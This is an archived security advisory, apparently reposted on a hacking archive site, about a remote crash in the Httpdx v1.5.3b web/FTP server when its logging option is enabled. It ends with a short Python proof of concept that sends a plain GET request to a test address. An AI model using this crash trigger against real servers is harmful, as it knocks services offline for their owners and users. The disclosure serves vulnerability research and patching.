AOH :: HP Unsorted V :: BU-2048.HTM

Httpdx v1.5.3b vulnerability



Vulnerability Httpdx v1.5.3b
Vulnerability Httpdx v1.5.3b




Program          : Httpdx v1.5.3b
PoC              : Remote Crash Service (if http.log=1)
Homepage : http://sourceforge.net/projects/httpdx/ 
Found by         : Jonathan Salwan
This Advisory    : Jonathan Salwan
Contact : j.salwan@sysdream.com 

//----- Application description
 
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file. 
 
 
//----- Description of vulnerability
 
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
 
Use simple GET request for crash service.

 
//----- Credits
 
http://www.sysdream.com/article.php?story_id=325§ion_id=78 
http://www.shell-storm.org 
 
 

import urllib
import urllib2

url = 'http://172.16.240.128/' 

req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page = answer.read()


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.